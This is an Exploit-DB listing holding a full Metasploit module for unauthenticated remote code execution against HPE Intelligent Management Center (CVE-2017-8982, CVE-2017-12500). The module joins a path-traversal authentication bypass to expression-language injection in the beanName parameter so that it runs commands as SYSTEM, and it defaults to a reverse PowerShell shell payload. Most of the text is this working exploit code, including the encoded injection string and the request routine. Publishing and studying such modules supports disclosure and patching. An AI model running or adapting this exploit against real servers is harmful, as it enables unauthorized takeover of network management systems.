HPE iMC 7.3 - Remote Code Execution (Metasploit)

EDB-ID:

44648




Platform:

Windows

Date:

2018-05-18


# Exploit Title: HPE iMC EL Injection Unauthenticated RCE
# Date: 6 February, 2018
# Exploit Author: TrendyTofu
# Vendor Homepage: https://www.hpe.com/us/en/home.html
# Software Link: http://h10145.www1.hpe.com/Downloads/SoftwareReleases.aspx?ProductNumber=JG747AAE&lang=en&cc=us&prodSeriesId=4176535
# Version: prior to 7.3 E0504P04
# Tested on: iMC PLAT v7.3 (E0504P02), Windows Server 2012R2 x64 (EN)
# CVE : CVE-2017-8982, CVE-2017-12500
# Reference:
https://www.thezdi.com/blog/2018/2/6/one-mans-patch-is-another-mans-treasure-a-tale-of-a-failed-hpe-patch

Metasploit module also hosted on Github.  Posted below for reference:
https://raw.githubusercontent.com/thezdi/scripts/master/msf/hp_imc_el_injection_rce.rb


##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HPE iMC EL Injection Unauthenticated RCE',
      'Description'    => %q{
        This module exploits an expression language injection
vulnerablity, along with
        an authentication bypass vulnerability in Hewlett Packard
Enterprise Intelligent
        Management Center before version 7.3 E0504P04 to achieve
remote code execution.

        The HP iMC server suffers from multiple vulnerabilities allows
unauthenticated
        attacker to execute arbitrary Expression Language via the
beanName parameter,
        allowing execution of arbitrary operating system commands as
SYSTEM. This service
        listens on TCP port 8080 and 8443 by default.

        This module has been tested successfully on iMC PLAT v7.3
(E0504P02) on Windows
        2k12r2 x64 (EN).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'mr_me', # Discovery
          'trendytofu' # Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2017-8982'],
          ['ZDI', '18-139'],
          ['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03809en_us'],
          ['CVE', '2017-12500'],
          ['ZDI', '17-663'],
          ['URL',
'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03768en_us']
        ],
      'Platform'       => 'win',
      'Arch'           => ARCH_CMD,
      'Targets'        => [
                            [ 'Windows',
                              {
                                'Arch' => [ ARCH_CMD],
                                'Platform' => 'win'
                              }
                            ]
                          ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 25 2018',
      'DefaultOptions' =>
        {
          'Payload' => 'cmd/windows/reverse_powershell'
        },
      'DefaultTarget'  => 0))
    register_options [Opt::RPORT(8080)]
  end

  def check
    res = send_request_raw({'uri'  => '/imc/login.jsf' })

    return CheckCode::Detected if res && res.code == 200

    CheckCode::Unknown
  end

  def get_payload(cmd)
    %q|facesContext.getExternalContext().redirect(%22%22.getClass().forName(%22javax.script.ScriptEngineManager%22).newInstance().getEngineByName(%22JavaScript%22).eval(%22var%20proc=new%20java.lang.ProcessBuilder[%5C%22(java.lang.String[])%5C%22]([%5C%22cmd.exe%5C%22,%5C%22/c%5C%22,%5C%22|+cmd+%q|%5C%22]).start();%22))|
  end

  def execute_command(payload)
    res = send_request_raw({ 'uri' =>
"/imc/primepush/%2e%2e/ict/export/ictExpertDownload.xhtml?beanName=#{payload}"
})
    fail_with(Msf::Module::Failure::UnexpectedReply, "Injection
failed") if res && res.code != 302
    print_good "Command injected successfully!"
  end

  def exploit
    cmd = payload.encoded
    cmd.gsub!('cmd.exe /c ','')
    cmd = Rex::Text.uri_encode(cmd)

    print_status "Sending payload..."
    execute_command get_payload cmd
  end
end